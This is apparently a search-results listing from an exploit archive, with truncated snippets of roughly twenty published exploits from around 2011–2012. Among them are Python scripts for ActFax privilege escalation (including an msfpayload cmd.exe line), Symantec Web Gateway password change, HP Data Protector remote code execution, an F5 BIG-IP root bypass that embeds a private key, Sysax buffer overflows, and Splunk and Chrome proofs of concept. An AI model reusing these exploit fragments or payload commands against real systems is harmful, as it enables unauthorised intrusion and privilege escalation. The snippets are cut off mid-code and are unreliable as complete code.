1321 matches found
Broadcom DoS on BCM4325 and BCM4329 Devices
Exploit for hardware platform in category dos / poc Exploit Author: CoreLabs Core Security Technologies fue descubierta por el investigador argentino Andrés Blanco, Vendor Homepage: Software Link: download link if available Version: 1.0 Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HT...
ActFax Server 4.31 Build 0225 - Local Privilege Escalation
!/usr/bin/python Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html msfpayload windows/exec CMD=cmd.exe R | msfencode -e...
Symantec Web Gateway 5.0.3.18 Password Change
!/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts = 'target':'executivesummary.php', 'USERNAME':username,...
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
Exploit for linux platform in category web applications !/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts =...
HP Data Protector Client 6.11 / 6.20 Remote Code Execution
!/usr/bin/env python Exploit Title: HP Data Protector Client EXECCMD Remote Code Execution Vulnerability Date: 2012-12-06 Exploit Author: Ben Turner Vendor Homepage: www.hp.com Version: 6.11 & 6.20 Tested on: Windows 2003 Server SP2 en CVE: CVE-2011-0922 Notes: ZDI-11-056 Reference:...
F5 BIG-IP - Authentication Bypass
F5 BIG-IP - Authentication Bypass !/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w"...
F5 BIG-IP - Authentication Bypass
!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...
F5 BIG-IP Remote Root Authentication Bypass
!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...
Heap spraying Adobe Illustrator
Due to the recent patched vulnerabilities in Adobe Illustrator CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026 it becomes interesting to analyze the exploitability facts of the .ai file format. Early versions of the AI file format are true EPS files with a restricted, compact synta...
HT Editor Spawning Root Shell
Exploit for linux platform in category remote exploits !/usr/bin/python Exploit Title: HT Editor Spawning Root Shell Date: 29-Mar-2012 Author: blusp10it Version: 2.0.18 Download: http://sourceforge.net/projects/hte/files/ht-source/ht-2.0.18.tar.gz Tested on: BackTrack 4 R2, Ubuntu 10.04 Run with:...
Sysax Multi Server 5.53 - SFTP (Authenticated) (SEH)
!/usr/bin/python Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit Egghunter Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Software Versions Tested: 5.53 Date Discovered: Febrary 22, 2012 Vendor Contacted: Febrary 23, 2012 Vendor Response: February 27, 2012 Vendor Fix: Version 5.55...
DPScan : Drupal Security Scanner Released
DPScan : Drupal Security Scanner Released The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines. This small tool is publ...
Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)
Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution Egghunter !/usr/bin/python Title: Sysax Multi Server " sys.exit1 target = sys.argv1 port = intsys.argv2 user = sys.argv3 password = sys.argv4 opersys = sys.argv5 base64 encode the provided creds creds =...
Microsoft Windows - Assembly Execution (MS12-005)
Microsoft Windows - Assembly Execution MS12-005 Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE :...
Microsoft Windows - Assembly Execution (MS12-005)
Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE : CVE-2012-0013 PoC:...
PHP Hash Table Collision - Denial of Service (PoC)
!/usr/bin/env python """ This script was written by Christian Mehlmauer https://twitter.com/!/FireFart Sourcecode online at: https://github.com/FireFart/HashCollision-DOS-POC Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision...
TFTP-Server-1.4ST
Stack-Based buffer overflow in TFTP Server SP 1.4 for Windows allow remote attackers to cause a DoS or execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error in the handling of filenames and can be exploited to cause a stack-base...
Splunk Remote Root Exploit
Exploit for multiple platform in category remote exploits from sec1httplib.requestbuilder import Requestobj from sec1httplib.threaddispatcher import import threading import re import urlparse import sys import urllib import base64 from optparse import OptionParser import sys """ Source:...
Google Chrome PoC, killing thread
No description provided by source. -' pigtail23 -' -' www.remoteshell.de -.OO .- OO.- OO .-/ -. .' \ ,--' ,----'/ '. / ,---. ,--',--. .----. .----. ...--'' | OO' .-OO |'--...| \ /.\ | OO| -',-. |.-, | | |.' | | | | | .-, --. .--''-'|.' | | | | |OO .' .' | | ..'| |/ | | './ | | | .-. || |/| ' |...
Google Chrome - Killing Thread (PoC)
Google Chrome - Killing Thread PoC -' pigtail23 -' -' www.remoteshell.de -.OO .- OO.- OO .-/ | '-' | | | | | | | | |'-| |'| |\ -' / --' --' -----' --' --' --' --' -----' ------' ---'' October 22, 2011 Ohh nice! What u doing google? Thx 4 ur bug! 0o Google Chrome PoC, killing thread. Exploitable o...